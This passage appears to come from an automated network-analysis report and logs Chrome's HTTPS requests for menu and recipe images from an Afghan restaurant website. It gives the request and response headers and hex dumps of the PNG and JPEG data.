                                                                                                                                                    2024-10-01 04:26:54 UTC16384INData Raw: 98 6b 6d be c0 a7 5b df ab d8 14 d7 4d 89 3a 7a 01 a8 9e 4b 58 34 b5 16 e5 7a ee c5 bc b7 80 b1 50 b2 d1 67 16 56 05 5f 65 01 66 c0 6e 0b 3c 41 a1 a9 c4 75 60 4b 4a 32 5a 9b 91 2a b9 f8 28 be 56 ac 65 4c 56 22 f1 87 90 83 ed 68 cc 47 e3 0c b7 f2 16 7e 63 63 0b 30 04 b5 80 2c d8 96 b8 96 9e 2b f2 1b 38 e8 7f 35 29 c4 0a d1 15 87 b2 9e 0f 79 28 7c 81 41 f6 99 22 7e c1 59 fb 42 5d b7 af d8 95 00 0d 57 7b 1f ae dd d6 a8 df b8 48 ea b7 35 04 ed 3e 48 52 bd 1f 91 36 ab 2f 7c 74 ce ff 00 71 e5 b6 9b fc 45 7b 36 40 d7 06 14 ef 26 a1 b3 68 b1 a3 64 28 76 52 74 11 69 7d 9a ac ae c3 55 02 b7 db 35 55 bb 66 c9 66 7e 47 32 90 71 5a 01 31 ed 69 f6 b6 c5 0a fb 0e cd 56 b5 8c 35 76 4a bf 99 04 d4 4c 5d fa e5 1f 4f 70 ad 48 1d 06 8e ca ac 04 5a 4b 38 7d a2 66 ce ef 36 6d
                                                                                                                                                    Data Ascii: km[M:zKX4zPgV_efn<Au`KJ2Z*(VeLV"hG~cc0,+85)y(|A"~YB]W{H5>HR6/|tqE{6@&hd(vRti}U5Uff~G2qZ1iV5vJL]OpHZK8}f6m
                                                                                                                                                    2024-10-01 04:26:54 UTC16384INData Raw: 06 ee ba 31 ab 59 eb 95 d4 71 5d 64 c5 af c5 2a 1c d5 69 39 7d 30 c2 dd 35 44 df be c3 02 16 34 ea 04 0d 48 23 73 5c 15 e8 aa 14 d1 e6 43 63 6f 59 a8 69 ed 01 8b b1 5b 8b 2e f2 57 bc 87 3a 94 f1 d9 52 39 59 6f 19 b0 42 35 07 c9 4f c8 54 ec 96 ac ce b2 92 2b e9 fe 48 75 67 62 13 7a 9a bb 5b 35 ec b7 b1 d7 b4 2a 59 59 36 58 21 3c e3 02 17 51 08 7e df ab 5a 2d d1 e9 0d 42 f2 48 a5 78 a9 b8 b8 ae d0 54 61 c1 d7 0c 5c b5 70 d8 ae 36 10 59 2c ae ca 67 55 da fe 8d eb 87 3d af 4c 9b e6 da 9b 46 db 29 fc 36 90 a2 a0 c5 88 05 89 4d 05 92 d5 e5 2a d7 4a c5 95 17 16 b3 34 4d 5f 19 b1 c2 4a f5 d9 d8 6b 09 af ae 19 8d 01 67 6d d7 d7 b6 bb 54 35 8b a5 b8 75 5e dd 65 6a ea b4 44 b0 33 23 da 11 76 84 56 e2 06 4c a6 ab 2f 6a fa 5b ea 5b 93 5e b9 55 95 a3 6c 77 8b 60 4d f0
                                                                                                                                                    Data Ascii: 1Yq]d*i9}05D4H#s\CcoYi[.W:R9YoB5OT+Hugbz[5*YY6X!<Q~Z-BHxTa\p6Y,gU=LF)6M*J4M_JkgmT5u^ejD3#vVL/j[[^Ulw`M
                                                                                                                                                    2024-10-01 04:26:54 UTC16384INData Raw: 6b d5 91 d5 dc 6a e4 8b d9 9f e2 40 b4 b2 d8 a2 7d 59 92 c4 91 34 49 79 17 7b 5e 92 53 91 bc b4 91 a6 e5 dd c6 99 34 4f 3e 18 2d c5 28 b9 1c 33 a7 21 b5 89 3e a4 5f b9 12 cb 12 c8 5d 28 4e 77 45 3a 48 78 0a 04 d7 99 1a b0 27 4f 52 21 f7 52 59 0d 16 26 90 5d 92 6d 7e 46 d6 36 b1 25 8c b9 6c 3d 45 ad 4b 96 c4 83 ea 6d d2 5c 4c 94 5d 8f 46 af d9 c1 05 f1 d3 4b 92 99 0d 12 f1 24 b7 04 17 a3 44 72 e1 96 ee 47 3c 8e 70 5d ed d2 4a d5 d3 ab 11 22 11 7b 23 69 19 b2 59 14 82 16 23 9c 4b ab 90 9d f9 11 e9 e6 43 cc 4d 5f 51 31 b5 ea e4 47 a7 55 20 bf 90 8b 92 78 0f c0 68 87 89 24 aa 58 b9 a7 f9 12 98 b8 de 13 e9 ad af b8 84 ac 6e d7 89 6a c2 cc 84 63 58 7f 0e 69 72 69 7c c8 d2 5d e2 74 92 47 b8 84 b0 cf dc 37 9f b4 97 98 b3 20 88 30 a3 91 44 2f 71 68 1d f1 31 13 49
                                                                                                                                                    Data Ascii: kj@}Y4Iy{^S4O>-(3!>_](NwE:Hx'OR!RY&]m~F6%l=EKm\L]FK$DrG<p]J"{#iY#KCM_Q1GU xh$XnjcXiri|]tG7 0D/qh1I


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    110192.168.2.449878162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:53 UTC411OUTGET /assets/imgs/menu_imges/Marinated_Chicken_tenderloin.png HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:54 UTC352INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:54 GMT
                                                                                                                                                    content-type: image/png
                                                                                                                                                    last-modified: Wed, 27 Sep 2023 22:14:24 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 37004
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:54 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:54 UTC16032INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 57 00 00 00 4b 08 06 00 00 00 05 dc 1b 8c 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 0a 4d 69 43 43 50 50 68 6f 74 6f 73 68 6f 70 20 49 43 43 20 70 72 6f 66 69 6c 65 00 00 78 da 9d 53 77 58 93 f7 16 3e df f7 65 0f 56 42 d8 f0 b1 97 6c 81 00 22 23 ac 08 c8 10 59 a2 10 92 00 61 84 10 12 40 c5 85 88 0a 56 14 15 11 9c 48 55 c4 82 d5 0a 48 9d 88 e2 a0 28 b8 67 41 8a 88 5a 8b 55 5c 38 ee 1f dc a7 b5 7d 7a ef ed ed fb d7 fb bc e7 9c e7 fc ce 79 cf 0f 80 11 12 26 91 e6 a2 6a 00 39 52 85 3c 3a d8 1f 8f 4f 48 c4 c9 bd 80 02 15 48 e0 04 20 10 e6 cb c2 67 05 c5 00 00 f0 03 79 78 7e 74 b0 3f fc 01 af 6f 00 02 00 70 d5 2e 24 12 c7 e1 ff 83 ba 50 26 57 00 20 91 00 e0 22 12 e7 0b 01 90 52
                                                                                                                                                    Data Ascii: PNGIHDRWKpHYsMiCCPPhotoshop ICC profilexSwX>eVBl"#Ya@VHUH(gAZU\8}zy&j9R<:OHH gyx~t?op.$P&W "R
                                                                                                                                                    2024-10-01 04:26:54 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii:
                                                                                                                                                    2024-10-01 04:26:54 UTC4588INData Raw: 6f 3e cb cf fc d4 f7 70 64 fe 23 5c b9 f4 02 5b 9b 97 78 f6 1b bf 48 63 e2 30 87 0e bf 95 c3 95 53 fc c4 db 7e 96 b5 17 9f e4 dc f6 67 91 a2 35 ae f2 74 e3 02 70 21 3d 9c 70 e3 96 30 53 5c ef 2a 2d 8a 82 30 8a 0f 44 d1 6b d4 8a 69 0b 51 50 92 ca 0f 71 c9 b8 6c a7 70 06 44 8a 74 43 5c da c5 f4 37 70 f4 b1 d9 16 99 39 40 58 f6 08 1b b3 78 d5 05 ac 8b 81 08 e5 07 6c 9d f9 0a fd f3 5f 44 58 45 b2 f4 32 04 31 c3 f5 97 f0 fc 2a 7e 73 01 4f af 23 73 87 0a 6a 0c 56 5f 64 e3 f9 97 51 7a 9e ca a1 43 a8 4a 0d 5d 9a 45 fb 35 54 6d 02 21 73 92 a2 83 96 03 82 b2 cf 70 a3 8f a6 a0 3a 3b 87 17 f9 d8 d2 3c 95 a9 26 4a 25 e4 69 81 67 2e 41 7f 1d 3c 05 32 82 c9 bb 38 f3 e4 a3 7c e9 f4 13 cc 2f c0 64 7c 80 9e 28 21 ad 4f b5 b4 97 c9 da 24 c7 5f f8 32 59 f6 24 77 df f1 20 64
                                                                                                                                                    Data Ascii: o>pd#\[xHc0S~g5tp!=p0S\*-0DkiQPqlpDtC\7p9@Xxl_DXE21*~sO#sjV_dQzCJ]E5Tm!sp:;<&J%ig.A<28|/d|(!O$_2Y$w d


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    111192.168.2.449877162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:53 UTC663OUTGET /assets/imgs/food_menu_seafood.png HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                    Referer: https://www.afghanhayatrestaurant.com.au/assets/css/custom.css
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:54 UTC352INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:54 GMT
                                                                                                                                                    content-type: image/png
                                                                                                                                                    last-modified: Wed, 05 Apr 2023 14:05:52 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 17355
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:54 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:54 UTC16384INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 40 00 00 00 2d 08 06 00 00 00 1e 03 6d 5a 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 3b 6a 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 0a 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 31 31 20 37 39 2e 31 35 38 33 32 35 2c 20 32 30 31 35 2f 30 39 2f 31 30 2d 30 31 3a 31 30 3a 32 30 20 20 20 20 20 20 20 20 22 3e 0a 20 20 20 3c 72 64 66
                                                                                                                                                    Data Ascii: PNGIHDR@-mZpHYs;jiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?><x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 "> <rdf
                                                                                                                                                    2024-10-01 04:26:54 UTC971INData Raw: 3a 49 d2 97 ec 18 9d 2a e9 0f ae 3f 51 d2 c9 2e 5f 69 2b 21 49 c3 24 dd 28 69 5c 38 ff fb 25 3d e9 bc c1 b8 b2 cf f8 45 00 d0 5e 36 af b5 8e 57 d6 b8 ce 66 49 ab 25 3d 9e 67 be 2a 46 4a d5 c0 d9 c6 82 69 66 70 f9 d4 2a 69 c4 c2 b0 83 3b ac 49 c7 86 7a 97 9a 6e af 37 19 7a c3 8e 54 54 d9 69 8e 46 bd c6 81 a5 96 70 7f 8f 8f d9 7f 68 6d 67 aa 53 12 c0 b8 30 e8 cb c0 ac 50 a7 c6 11 a6 61 21 3a 84 e9 71 3e 70 3d c6 81 93 ab 81 9f 98 59 62 6f 34 31 d4 6d c0 eb c0 7d 7e 37 df 71 86 a9 76 ba 56 66 84 b2 28 cc 35 57 6a 84 a7 10 22 57 04 8d 69 34 18 b6 d9 17 38 31 08 e9 56 e0 eb c0 14 a3 3d c0 b5 a1 8f 42 a0 d5 37 78 8c 0f d8 25 9f e3 71 2a 81 53 81 d1 f6 63 d6 ba 3c 01 6b a4 fa 0f 24 8b 56 4c 54 b8 94 94 70 61 81 a4 8b 24 b5 b8 6c b6 23 c1 29 cd 75 c0 a5 9f a4 b5
                                                                                                                                                    Data Ascii: :I*?Q._i+!I$(i\8%=E^6WfI%=g*FJifp*i;Izn7zTTiFphmgS0Pa!:q>p=Ybo41m}~7qvVf(5Wj"Wi481V=B7x%q*Sc<k$VLTpa$l#)u


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    112192.168.2.449879162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:53 UTC658OUTGET /assets/imgs/img_recipe_6.jpg HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                    Referer: https://www.afghanhayatrestaurant.com.au/assets/css/custom.css
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:54 UTC353INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:54 GMT
                                                                                                                                                    content-type: image/jpeg
                                                                                                                                                    last-modified: Wed, 27 Sep 2023 23:03:10 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 92120
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:54 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:54 UTC16031INData Raw: ff d8 ff e1 12 b6 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 0c 01 00 00 03 00 00 00 01 04 b0 00 00 01 01 00 03 00 00 00 01 06 40 00 00 01 02 00 03 00 00 00 03 00 00 00 9e 01 06 00 03 00 00 00 01 00 02 00 00 01 12 00 03 00 00 00 01 00 01 00 00 01 15 00 03 00 00 00 01 00 03 00 00 01 1a 00 05 00 00 00 01 00 00 00 a4 01 1b 00 05 00 00 00 01 00 00 00 ac 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 22 00 00 00 b4 01 32 00 02 00 00 00 14 00 00 00 d6 87 69 00 04 00 00 00 01 00 00 00 ec 00 00 01 24 00 08 00 08 00 08 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 43 20 32 30 31 35 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 33 3a 30 39 3a 32 37 20 31 39 3a 30 33 3a 30 37 00 00 00 00 04 90 00 00 07 00
                                                                                                                                                    Data Ascii: ExifMM*@(1"2i$''Adobe Photoshop CC 2015 (Windows)2023:09:27 19:03:07
                                                                                                                                                    2024-10-01 04:26:54 UTC16384INData Raw: 3b 26 09 bc 66 b4 7b 14 ed c7 45 2d 1c fb 15 84 44 60 02 76 7a cd 32 74 d2 64 03 b2 28 d4 ea 00 f9 f8 ef bd d3 70 7d 76 7c dd 46 d6 0e b1 c7 ab 1a 6b 5c ec 46 ad 89 77 df 38 8d 58 8d 6b 09 94 a1 36 d9 a2 56 b5 49 99 46 69 e3 31 c8 8c 23 54 b5 0b dc fe f1 e3 1b 7c f4 79 bd f5 21 19 ad 1c 9d 7c 8c dc 11 16 b9 0e 33 83 87 76 42 94 46 51 3a 64 b4 74 c8 12 48 14 a3 20 53 1c d5 8a ed 2b 6a c4 a6 11 1e bd ba c5 45 25 58 bb 27 06 78 a6 a4 32 08 8b e8 16 f2 e9 7e 83 92 bd 19 fa 16 9f 39 b1 87 16 cb 45 f7 cd d9 af b5 5a ec 90 02 62 41 2b 35 ed 5c 18 b5 25 ac 9e 30 78 25 08 c2 59 8e 12 5c 3f 07 da f9 4e 9a 72 9b 9c dc 71 f6 18 83 28 ed e6 ba 31 8a 75 44 24 9d a6 49 26 d2 69 0a 2d 24 34 ce c0 9d 90 9d d9 14 c4 11 02 16 2a 94 2c 53 b9 52 75 b9 5a cd 65 71 74 af 9d 3b
                                                                                                                                                    Data Ascii: ;&f{E-D`vz2td(p}v|Fk\Fw8Xk6VIFi1#T|y!|3vBFQ:dtH S+jE%X'x2~9EZbA+5\%0x%Y\?Nrq(1uD$I&i-$4*,SRuZeqt;
                                                                                                                                                    2024-10-01 04:26:54 UTC16384INData Raw: e4 98 98 f4 2b e6 f7 21 99 99 a1 fb 85 61 03 1f 4d 53 c6 5c dc 8a 8f c1 7c 25 47 f3 6f f2 31 fe e6 1f 0a e8 ca 3d e8 8b fd 07 6c cd 47 ca e7 d3 1e 8f 53 33 1d 60 07 83 16 b0 65 dc aa 95 3f b8 3f c2 a7 1c a5 87 88 6f f1 d7 f2 d6 08 25 92 cb 14 47 bc b2 b9 e4 70 b3 fb 7d 4f 60 80 e2 6b 5a 12 7e cd 70 5f 59 0a ca f0 8c 43 36 4e 12 57 f7 b9 03 29 1e cb d6 e6 c1 c4 00 63 fd b5 06 5a e1 f8 d8 18 46 31 b1 92 72 46 09 c4 23 13 33 94 c8 84 88 d6 a8 85 c9 f4 12 a3 ea 3c 4a ae 36 09 b4 d9 f4 4f bb 1e 53 6a ac ad 4d c8 02 66 41 8e 66 a1 8c 72 0f da da bc 58 0a 92 40 83 ef ee 2c 3e 0b 42 c4 46 76 85 89 f5 10 c4 f1 3e e3 d6 87 36 0b 9b 93 c1 e2 29 c8 65 cc b6 92 ae 2c 78 8c c4 8a 8d a2 b5 6a d9 ad 10 e3 16 1c 2b 91 6c b6 bc 1f 13 84 63 c8 98 c2 30 98 fa 00 82 2f da 11
                                                                                                                                                    Data Ascii: +!aMS\|%Go1=lGS3`e??o%Gp}O`kZ~p_YC6NW)cZF1rF#3<J6OSjMfAfrX@,>BFv>6)e,xj+lc0/
                                                                                                                                                    2024-10-01 04:26:54 UTC15252INData Raw: 39 47 e9 1c 97 ea 76 50 db af b1 5c 2f c4 a6 c5 4e 34 3a 41 63 1f c6 63 13 73 64 58 7c 05 d2 42 a9 f4 5a c1 13 57 77 fd 8e d2 e4 47 5f 3a e7 f1 d8 b9 16 2a 82 39 8c 2a 80 1c 04 34 a9 61 c4 99 93 96 c8 8c 42 a9 2a 4b 55 75 b0 75 bb 36 13 d0 6d 93 5f c6 f7 89 3f 19 dc 69 ff 00 58 dd 31 be 31 b4 f1 fe 2f b6 d3 fe a1 b2 63 7c 2f 69 a1 f8 96 d6 2c f8 3e e3 bf fd 27 7a 2f c2 77 f3 5f c3 76 d0 ff 00 d5 37 63 fc 43 6d 96 af 86 ed a8 ff 00 a9 ed 10 7e 29 b3 0f c4 76 5a 7f d3 76 48 1f 0d d9 13 fe a1 b5 86 f8 56 d1 8b f0 9d 89 5f c2 ed 58 7e 21 69 96 7c 18 b9 1f 02 cc 4f 86 28 9f f4 f5 9e f2 45 b5 96 7e ed eb 17 b3 b8 4a 7b 15 69 ef 03 39 09 b9 b9 88 8a 73 52 9b 1d 00 03 d4 cf 9d 76 5f eb fa 9e bb 50 eb eb bf 25 29 63 b8 b9 4f 1a 4e 59 4f 9b 2e 5a 05 3d 8a 58 09 0d
                                                                                                                                                    Data Ascii: 9GvP\/N4:AccsdX|BZWwG_:*9*4aB*KUuu6m_?iX11/c|/i,>'z/w_v7cCm~)vZvHV_X~!i|O(E~J{i9sRv_P%)cONYO.Z=X
                                                                                                                                                    2024-10-01 04:26:54 UTC16384INData Raw: 1e 44 48 0a af e2 b0 58 2e f2 5c 10 52 b7 02 e0 1c 55 76 39 77 18 32 d3 38 49 f7 b2 1a 9f cc b8 b0 54 4e 02 e9 09 b6 03 e0 ca d8 97 cd 9d 00 46 57 03 93 52 ad 73 51 98 90 ba d4 07 a3 60 42 76 80 76 c1 34 a8 7c 07 d9 8a a1 55 c5 55 62 cb 1a 2a 60 ab 82 61 b1 93 11 e5 5a a4 57 19 55 0e 13 98 85 48 05 5b 71 5a c4 40 7c 95 60 0a 61 00 dd 4a b0 1e 65 d8 1e 65 f7 71 f3 2f ba 8f 99 7d d4 7c cb ee e3 e6 5f 77 1f 30 55 b7 0f 32 e1 b5 0f 30 4e 6d c7 cc 8b 5b 8b f5 2f bb 8f 99 30 00 0e a4 fa 22 7c 8b b1 16 ea 4f a2 3e 65 48 c7 cc 13 68 8b 75 2a 40 7d 0b 01 e6 54 01 fa 93 64 15 13 ac 56 2a 92 1f da a9 25 da 55 93 2d 5c cc 63 39 0d e1 39 b5 6e bd 01 69 9d a8 4a 22 80 10 8b 58 b6 3a 74 85 a7 b9 b6 db c0 01 30 83 75 27 b9 6c 1e b4 4d db 5c 49 e5 6a 9d 69 cd 9a f5 94 e6
                                                                                                                                                    Data Ascii: DHX.\RUv9w28ITNFWRsQ`Bvv4|UUb*`aZWUH[qZ@|`aJeeq/}|_w0U20Nm[/0"|O>eHhu*@}TdV*%U-\c99niJ"X:t0u'lM\Iji
                                                                                                                                                    2024-10-01 04:26:54 UTC11685INData Raw: d2 d5 71 81 27 88 0c cf ae 8e 9b 64 c9 e8 4f 6b e0 5a 81 d3 83 b9 44 76 ae 93 b9 39 22 59 16 0c a2 4e b8 e4 00 3a 99 7c ab a6 b2 c4 76 be 24 35 48 9e 92 9e 35 e8 42 42 a5 b0 64 c6 b2 67 29 88 06 98 ee 4f 14 2e 33 f5 05 7e e9 76 84 61 01 f6 e5 e2 c9 41 8b 16 46 12 ab 86 5f 2f b2 c8 cc 0e d9 7d b4 5c 2c fd 28 6a c7 36 55 5d dc 2a 73 e8 52 d2 5c c4 6f df c0 be 84 60 68 08 64 2d 39 2d 9a 35 ff 00 c5 08 ca 44 dc 7c 32 08 82 38 46 06 ab ca a4 34 b2 2e a2 c5 8e 1f 42 7b ce 6c d9 20 01 be 5e d2 e1 0c 05 13 08 d1 64 0a ae 39 a3 72 45 a0 ec 81 22 44 37 50 4c 0e 9b 62 9a 19 d1 d4 75 41 d8 53 b2 9e 25 fa 33 5d 9f 6b ca 9a 72 e1 11 60 00 5a 83 3b 50 94 5c 03 e4 55 24 83 88 e8 44 c5 e7 6c 9a 48 9f f4 e4 b8 58 05 26 30 0e fd a4 7b c9 c7 41 0c 34 56 a9 e1 de 48 c7 84 bd
                                                                                                                                                    Data Ascii: q'dOkZDv9"YN:|v$5H5BBdg)O.3~vaAF_/}\,(j6U]*sR\o`hd-9-5D|28F4.B{l ^d9rE"D7PLbuAS%3]kr`Z;P\U$DlHX&0{A4VH


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    113192.168.2.449880162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:53 UTC394OUTGET /assets/imgs/menu_imges/Prawn_curry.png HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:54 UTC352INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:54 GMT
                                                                                                                                                    content-type: image/png
                                                                                                                                                    last-modified: Wed, 27 Sep 2023 22:19:36 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 37258
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:54 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:54 UTC16032INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 57 00 00 00 4b 08 06 00 00 00 05 dc 1b 8c 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 0a 4d 69 43 43 50 50 68 6f 74 6f 73 68 6f 70 20 49 43 43 20 70 72 6f 66 69 6c 65 00 00 78 da 9d 53 77 58 93 f7 16 3e df f7 65 0f 56 42 d8 f0 b1 97 6c 81 00 22 23 ac 08 c8 10 59 a2 10 92 00 61 84 10 12 40 c5 85 88 0a 56 14 15 11 9c 48 55 c4 82 d5 0a 48 9d 88 e2 a0 28 b8 67 41 8a 88 5a 8b 55 5c 38 ee 1f dc a7 b5 7d 7a ef ed ed fb d7 fb bc e7 9c e7 fc ce 79 cf 0f 80 11 12 26 91 e6 a2 6a 00 39 52 85 3c 3a d8 1f 8f 4f 48 c4 c9 bd 80 02 15 48 e0 04 20 10 e6 cb c2 67 05 c5 00 00 f0 03 79 78 7e 74 b0 3f fc 01 af 6f 00 02 00 70 d5 2e 24 12 c7 e1 ff 83 ba 50 26 57 00 20 91 00 e0 22 12 e7 0b 01 90 52
                                                                                                                                                    Data Ascii: PNGIHDRWKpHYsMiCCPPhotoshop ICC profilexSwX>eVBl"#Ya@VHUH(gAZU\8}zy&j9R<:OHH gyx~t?op.$P&W "R
